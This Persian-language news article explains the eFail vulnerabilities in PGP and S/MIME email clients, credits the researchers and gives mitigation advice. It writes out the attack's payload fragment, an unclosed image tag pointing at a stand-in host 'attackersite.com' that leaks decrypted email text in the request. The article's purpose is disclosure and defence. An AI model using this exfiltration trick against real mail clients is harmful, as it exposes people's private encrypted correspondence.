eFail

محققان امنیتی جزئیات مجموعه‌ای از آسیب‌پذیری‌های کشف‌شده در سرویس‌های پست الکترونیک را برای دو استاندارد رمزگذاری پست الکترونیک که به‌طور گسترده استفاده می‌شوند (PGP و S/MIME) را منتشر کردند.

PGP و S/MIME استانداردهای رمزنگاری end-to-end محبوبی هستند که برای رمزگذاری پست‌‌های الکترونیک استفاده می‌شوند به‌گونه‌ای که هیچ‌کس، حتی یک شرکت، دولت و یا مجرمان اینترنتی نتوانند از ارتباطات شما جاسوسی کنند.

قبل از توضیح اینکه این آسیب‌پذیری چگونه کار می‌کند، لازم به ذکر است که این نقص در استانداردهای رمزنگاری پست الکترونیک قرار ندارد. در عوض، چندین افزونه و سرویس‌گیرنده(۱) را تحت تأثیر قرار می‌دهد که به‌طور غلط در این تکنولوژی‌ها پیاده‌سازی شده‌اند.

این آسیب‌پذیری‌ها که eFail نامیده شده‌اند، همان‌طور که درگذشته هم خبری در مورد آن‌ها گزارش شده بود[۱]، می‌توانند به مهاجمین بالقوه اجازه دهند که محتوای پست‌های الکترونیک رمزگذاری شده‌ی end-to-end شما را حتی برای پیام‌های ارسال‌شده درگذشته، به‌صورت متن واضح رمزگشایی کنند.

بر اساس گزارش منتشرشده توسط یک تیم از محققان امنیتی اروپایی[۲]، این آسیب‌پذیری‌ها در روشی که سرویس‌گیرنده‌های پست الکترونیکِ رمزگذاری شده ‌پست‌های الکترونیک HTML و منابع خارجی را اداره می‌کنند مانند بارگذاری تصاویر و سبک‌ها(۲) از URLهای خارجی قرار دارند.

حمله eFail چگونه کار می‌کند؟

S/MIME

سرویس‌گیرنده‌های پست الکترونیک معمولاً به‌گونه‌ای تنظیم می‌شوند که به‌صورت خودکار محتوای پست‌های الکترونیک رمزگذاری شده‌ی دریافتی توسط شما را رمزگشایی کنند، اما اگر سرویس‌گیرنده شما نیز برای بارگیری منابع خارجی نیز به‌طور خودکار تنظیم شده باشد، مهاجمان می‌توانند از این رفتار برای سرقت پیام‌ها به‌صورت متن واضح، فقط با ارسال یک نسخه اصلاح‌شده از همان محتوای پست الکترونیک رمزگذاری شده، سوء‌استفاده کنند.

شاخص حمله نیاز به یک تزریق متنِ واضح درون یک پست الکترونیکی رمز شده دارد و سپس با استفاده از بهره‌بردار، داده‌های ابتدایی رمزگذاری شده را به‌محض اینکه یک دریافت‌کننده به پیام دسترسی داشته باشد یا آن را رمزگشایی کند، exfiltrate می‌کند.

لازم به ذکر است که برای انجام حمله eFail، مهاجم باید به ‌پست‌های الکترونیک رمزگذاری شده شما دسترسی داشته باشد که بعدازآن به‌صورت زیر تغییر می‌یابد و به شما بازگردانده می‌شود تا سرویس‌گیرنده پست الکترونیک شما را گول بزند تا پیام مخفی را برای مهاجم و بدون اطلاع شما آشکار کند.

همان‌طور که در حمله اثبات ادعای منتشرشده توسط محققان توضیح داده شده است، مهاجم از یکی از پیام‌های رمز شده که شما می‌خواهید دریافت کنید یا ممکن است قبلاً دریافت کرده باشید استفاده می‌کند و سپس آن را به یک پیام متنی چندگانه HTML تبدیل می‌کند و همچنین آدرس بازگشت را جعل می‌کند که طوری به نظر برسد که از جانب فرستنده اصلی آمده است.

در پست الکترونیک جدیدِ ایجادشده، مهاجم یک تگ تصویر غیرفعال، مانند این <img src = “https://attackersite.com/ را درست قبل از محتویات رمزگذاری شده اضافه می‌کند و آن را با افزودن پایان برچسبِ تصویر(۳)، به پایان می‌رساند، مانند این: . jpg”>، همان‌طور که به‌وضوح در اسکرین‌شات زیر نشان داده شده است.

PGP

هنگامی‌که سرویس‌گیرنده‌ی پست الکترونیکِ آسیب‌پذیرِ شما این پیام را دریافت می‌کند، بخش رمزگذاری شده‌ای که در وسط داده شده است را رمزگشایی می‌کند و سپس به‌طور خودکار تلاش می‌کند محتوای HTML را، یعنی برچسب تصویر با تمام متن رمزگشایی‌شده را به‌عنوان نام جدید تصویر، رندر کند.

ازآنجاکه سرویس‌گیرنده‌ی پست الکترونیک شما سعی دارد تصویر را از سرور کنترل‌شده‌ی مهاجم بارگیری کند، مهاجم می‌تواند این درخواست ورودی را ضبط کند، چراکه نام فایل حاوی محتوای کامل پست الکترونیک اصلی رمز شده در متن واضح است.

اگرچه PGP طراحی شده است که به شما یک یادداشت هشداردهنده نشان دهد، اگر یکپارچگی پست الکترونیک شما در معرض خطر قرار گیرد، چندین سرویس‌گیرنده‌ی پست الکترونیک این هشدارها را نمایش نمی‌دهند و به مهاجمان احتمالی اجازه می‌دهند حملات eFail را با موفقیت انجام دهند.

چگونه می‌توان از حملات eFail جلوگیری کرد؟

پست‌های الکترونیک

به‌صورت کلی، این یک کار بسیار مشکل برای مهاجم است که در پست‌های الکترونیک رمزنگاری‌شده شما مداخله کند اما افرادی که بسیار از رمزنگاری پست الکترونیک استفاده می‌کنند، همیشه مهاجمان حرفه‌ای را به خود جذب می‌کنند.

فرار از استفاده از PGP یا S/MIME برای جلوگیری از حملات eFail یک مشاوره احمقانه است، زیرا بسیار ساده می‌توان از مسائل گزارش‌شده جلوگیری کرد.

کاربران می‌توانند به یک سرویس‌گیرنده پست الکترونیک معتبر که همیشه یک هشدار را زمانی که یکپارچگی پست‌های الکترونیک به خطر می‌افتد نشان می‌دهد رجوع کرده که به‌طور پیش‌فرض پست‌های الکترونیک HTML را رندر نمی‌کند تا از بارگیری منابع خارجی به‌صورت خودکار جلوگیری شود.

محققان همچنین به کاربران توصیه می‌کنند که یک الگوریتم رمزنگاری معتبر را برای ارتباطات حساس اتخاذ کنند.

این تحقیق توسط یک تیم از محققان، ازجمله Damian Poddebniak ،Christian Dresen ،Fabian Ising و Sebastian Schinzel از دانشگاهMunster ؛ Jens Müller ،Juraj Somorovsky و Jörg Schwenk از دانشگاه Ruhr  بوخوم؛ و Simon Friedberger از KU Leuven انجام شده است.

برای جزئیات بیشتر در مورد این تکنیک حمله، شما می‌توانید به این صفحه[۳] درباره حمله eFail و همچنین مقاله با عنوان Efail: Breaking S/MIME and Encrypting Email OpenPGP Using Channels Exfiltration که توسط محققان منتشر شده است مراجعه کنید [۲].

منابع

[۱] https://thehackernews.com/2018/05/pgp-smime-email-encryption.html

[۲] https://efail.de/efail-attack-paper.pdf

[۳] https://efail.de

[۴] https://thehackernews.com/2018/05/efail-pgp-email-encryption.html


(۱) client
(۲) styles
(۳) end of the image tag